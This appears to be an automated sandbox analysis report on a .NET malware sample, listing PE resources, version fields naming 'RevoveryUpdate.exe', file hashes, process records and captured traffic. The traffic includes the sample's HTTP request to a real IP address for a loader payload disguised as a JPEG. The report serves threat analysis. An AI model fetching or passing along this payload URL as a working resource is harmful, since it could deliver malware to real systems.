    .rsrc | 0x204000 | 0x27f96 | 0x28000 | False | 0.0666687011719 | data | 3.46254253895 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    Name | RVA | Size | Type | Language | Country
    RT_ICON | 0x204280 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | |
    RT_ICON | 0x214aa8 | 0x94a8 | data | |
    RT_ICON | 0x21df50 | 0x5488 | data | |
    RT_ICON | 0x2233d8 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 64767, next used block 4282318848 | |
    RT_ICON | 0x227600 | 0x25a8 | data | |
    RT_ICON | 0x229ba8 | 0x10a8 | data | |
    RT_ICON | 0x22ac50 | 0x988 | data | |
    RT_ICON | 0x22b5d8 | 0x468 | GLS_BINARY_LSB_FIRST | |
    RT_GROUP_ICON | 0x22ba40 | 0x76 | data | |
    RT_VERSION | 0x22bab8 | 0x2f4 | data | |
    RT_MANIFEST | 0x22bdac | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |
    Description | Data
    Translation | 0x0000 0x04b0
    LegalCopyright |
    Assembly Version | 1.0.0.0
    InternalName | RevoveryUpdate.exe
    FileVersion | 1.0.0.0
    CompanyName |
    LegalTrademarks |
    Comments |
    ProductName |
    ProductVersion | 1.0.0.0
    FileDescription |
    OriginalFilename | RevoveryUpdate.exe
    Timestamp | Source Port | Dest Port | Source IP | Dest IP
    • 194.87.31.4
    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    0 | 192.168.2.5 | 49736 | 194.87.31.4 | 80 | C:\Users\user\Desktop\P355uy6y7d.exe
    Timestamp | kBytes transferred | Direction | Data
    May 19, 2022 12:58:15.329128027 CEST | 212 | OUT | GET /loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpg HTTP/1.1
    Host: 194.87.31.4
    Connection: Keep-Alive
    May 19, 2022 12:58:15.354022026 CEST | 213 | IN | HTTP/1.1 200 OK
    Date: Thu, 19 May 2022 10:58:15 GMT
    Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.5
    Last-Modified: Thu, 19 May 2022 10:41:29 GMT
    ETag: "3414a-5df5b043804db"
    Accept-Ranges: bytes
    Content-Length: 213322
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: image/jpeg


    Target ID:0
    Start time:12:58:12
    Start date:19/05/2022
    Path:C:\Users\user\Desktop\P355uy6y7d.exe
    Wow64 process (32bit):false
    Commandline:"C:\Users\user\Desktop\P355uy6y7d.exe"
    Imagebase:0xbc0000
    File size:2276808 bytes
    MD5 hash:36CF17949DE5C5B6352C9D43AE2B6171
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:.Net C# or VB.NET
    Reputation:low

    Target ID:6
    Start time:12:58:23
    Start date:19/05/2022
    Path:C:\Windows\System32\WerFault.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\WerFault.exe -u -p 6948 -s 1360
    Imagebase:0x7ff76a840000
    File size:494488 bytes
    MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:.Net C# or VB.NET
    Reputation:high

    No disassembly